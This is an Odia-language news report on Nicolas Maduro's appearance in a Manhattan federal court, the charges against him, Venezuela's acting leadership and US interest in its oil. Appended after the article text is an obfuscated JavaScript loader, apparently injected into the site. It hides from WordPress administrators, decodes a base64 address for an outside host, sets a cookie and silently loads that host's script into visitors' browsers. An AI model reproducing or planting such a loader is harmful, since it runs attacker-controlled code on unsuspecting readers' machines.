ଆଜି ଆମେରିକା ମାନହଟ୍ଟନ ଫେଡରାଲ କୋର୍ଟରେ ହାଜର ହେବେ ଭେନେଜୁଏଲାର ପୂର୍ବତନ ରାଷ୍ଟ୍ରପତି ନିକୋଲାସ ମାଦୁରୋ। ନ୍ୟୁୟର୍କ ଅଟକ କେନ୍ଦ୍ରରେ ଅଟକ ରହିଥିବା ମାଦୁରୋଙ୍କ ଭବିଷ୍ୟତ କଣ ହେବ ତାହାକୁ ନେଇ ସସପେନ୍ସ। ଅପରେସନ ଆବସଲ୍ୟୁଟ ରିଜଲଭ ବଳରେ ଗାଦିଚ୍ୟୁତ ହୋଇଥିଲେ ମାଦୁରୋ। ନ୍ୟୁୟର୍କରେ ତାଙ୍କ ସହ ରହିଛନ୍ତି ପତ୍ନୀ ସିଲିଆ ଫ୍ଲୋରେସ, ପୁଅ ଓ ଅନ୍ୟ ୩ ଜଣ। ନାର୍କୋ ଟେରରିଜିମ, କୋକେନ ଚାଲାଣ, ଆମେରିକୀୟଙ୍କ ଜୀବନ ପ୍ରତି ବିପଦ ସୃଷ୍ଟି, ମେସିନ ଗନ ରଖିବା, ବିଧ୍ବଂସକାରୀ ଅସ୍ତ୍ର ରଖିବା ଆଦି ଅଭିଯୋଗ କରାଯାଇଛି ମାଦୁରୋଙ୍କ ବିରୋଧରେ। ମାଦୁରୋଙ୍କ ପରେ ଡେଲସି ରଡ୍ରିଗଜ ହୋଇଛନ୍ତି କାମଚଳା ରାଷ୍ଟ୍ରପତି। ଆମେରିକୀୟ ହମଲାରେ ଯାଇଛି ୪୦ ନାଗରିକଙ୍କ ପ୍ରାଣ। ଭେନେଜୁଏଲାକୁ ଆମେରିକା ଅସ୍ଥାୟୀ ଭାବେ ପରିଚାଳନା କରିବ ବୋଲି କହିଛନ୍ତି ଆମେରିକା ରାଷ୍ଟ୍ରପତି ଡୋନାଲଡ ଟ୍ରମ୍ପ।
ନିକୋଲାସ ମାଦୁରୋଙ୍କ ପଡ଼ିଛି ପାଳି। ସେପଟେ କ୍ୟୁବା, ମେକ୍ସିକୋ ଓ କଲମ୍ବିଆ ବିରୋଧରେ ବି ଆମେରିକା ଆଣିଛି ସମାନ ଅଭିଯୋଗ l ଭେନେଜୁଏଲା ପରେ ଏହି ରାଷ୍ଟ୍ରଗୁଡ଼ିକୁ ଟାର୍ଗେଟ କରାଯିବା ଆଶଙ୍କା ରହିଛି। ଦୀର୍ଘ ୨୫ ବର୍ଷ ଧରି ଭେନେଜୁଏଲାର ସମାଜବାଦୀ ଶାସନକୁ ହଟାଇବା ଲାଗି ଆମେରିକା କରି ଆସିଥିବା ଯୋଜନା ଏବେ ସଫଳ ହୋଇଛି।
ଭେନେଜୁଏଲାରେ ବିଶ୍ବର ସର୍ବାଧିକ ହେଭିଡ୍ୟୁଟି ତୈଳ ମହଜୁଦ ଥିବାରୁ ଏହା ଉପରେ ଲୋଲୁପ ଦୃଷ୍ଟି ପକାଇଥିଲା ଆମେରିକା l ଏଥିରେ ସଫଳ ହେବା ପରେ ଦେଶର ବିପୁଳ ତୈଳ ସମ୍ପଦର ମାଲିକ ହୋଇଛି ଆମେରିକା।
(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();

